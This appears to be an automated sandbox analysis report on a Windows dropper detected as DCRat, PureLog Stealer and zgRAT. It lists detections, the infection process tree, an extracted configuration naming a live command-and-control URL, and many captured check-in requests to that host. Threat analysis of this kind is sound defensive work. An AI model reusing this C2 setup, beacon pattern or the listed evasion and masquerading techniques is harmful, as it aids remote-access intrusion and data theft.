Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cuAvoExY41.exe

Overview

General Information

Sample name:cuAvoExY41.exe
renamed because original name is a hash value
Original sample name:7DDACBFDACD9E8AEACD1B0F2DEA51F4E.exe
Analysis ID:1502155
MD5:7ddacbfdacd9e8aeacd1b0f2dea51f4e
SHA1:36667e13972c28da816f52fd4ef2b910e50de531
SHA256:dc6859bdfc93d108f11e63dc630453b11c0be85446fd448d3c2c1aa5ad4ce077
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cuAvoExY41.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\cuAvoExY41.exe" MD5: 7DDACBFDACD9E8AEACD1B0F2DEA51F4E)
    • wscript.exe (PID: 7328 cmdline: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainPortServerBrowsermonitor.exe (PID: 7464 cmdline: "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe" MD5: 5FA91A09D2073FA85C2B69A00EA7C1FC)
          • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7592 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://hvatit.top/dbwp", "MUTEX": "DCR_MUTEX-m1fLYfg6CkBPCrY00CRN", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cuAvoExY41.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    cuAvoExY41.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.cuAvoExY41.exe.6e706ef.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.cuAvoExY41.exe.6e706ef.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.cuAvoExY41.exe.65786ef.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.cuAvoExY41.exe.65786ef.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, ProcessId: 7464, TargetFilename: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\cuAvoExY41.exe", ParentImage: C:\Users\user\Desktop\cuAvoExY41.exe, ParentProcessId: 7284, ParentProcessName: cuAvoExY41.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" , ProcessId: 7328, ProcessName: wscript.exe

                                    Suricata Signatures

                                    Timestamp:2024-08-31T09:32:13.286244+0200
                                    SID:2048095
                                    Severity:1
                                    Source Port:49732
                                    Destination Port:80
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: cuAvoExY41.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://hvatit.top/dbwp.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\Desktop\EQOQCKPT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\oOILjGZF.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\AppData\Local\Temp\KhSi255NBg.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\surrogateFontdhcpCommon\OneEFBaC8w.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\mKRcJKjf.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\surrogateFontdhcpCommon\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\vnZStDyM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://hvatit.top/dbwp", "MUTEX": "DCR_MUTEX-m1fLYfg6CkBPCrY00CRN", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeReversingLabs: Detection: 91%
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeReversingLabs: Detection: 91%
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exeReversingLabs: Detection: 91%
                                    Source: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Users\user\Desktop\CUGzHwzy.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\CUGzHwzy.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Users\user\Desktop\EQOQCKPT.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\EQOQCKPT.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Users\user\Desktop\UxpXqoOQ.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\VDAxqXDQ.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\VDAxqXDQ.logVirustotal: Detection: 27%Perma Link
                                    Source: C:\Users\user\Desktop\dVTvzLpX.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\ddDNduPc.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\ddDNduPc.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Users\user\Desktop\ffpwzeUX.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ffpwzeUX.logVirustotal: Detection: 27%Perma Link
                                    Source: C:\Users\user\Desktop\mKRcJKjf.logVirustotal: Detection: 21%Perma Link
                                    Source: C:\Users\user\Desktop\oOILjGZF.logVirustotal: Detection: 21%Perma Link
                                    Source: C:\Users\user\Desktop\vnZStDyM.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\vnZStDyM.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeReversingLabs: Detection: 91%
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeReversingLabs: Detection: 91%
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\surrogateFontdhcpCommon\upfc.exeReversingLabs: Detection: 91%
                                    Source: C:\surrogateFontdhcpCommon\upfc.exeVirustotal: Detection: 54%Perma Link
                                    Multi AV Scanner detection for submitted file
                                    Source: cuAvoExY41.exeReversingLabs: Detection: 65%
                                    Source: cuAvoExY41.exeVirustotal: Detection: 57%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\Desktop\EQOQCKPT.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\dVTvzLpX.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoe Sandbox ML: detected
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeJoe Sandbox ML: detected
                                    Source: C:\surrogateFontdhcpCommon\upfc.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\UxpXqoOQ.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\vnZStDyM.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: cuAvoExY41.exeJoe Sandbox ML: detected
                                    Source: cuAvoExY41.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\6bc8f6e50ab287Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\24dbde2999530eJump to behavior
                                    Source: cuAvoExY41.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cuAvoExY41.exe
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FBA69B
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FCC220
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 80.211.144.156:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 380Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2548Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
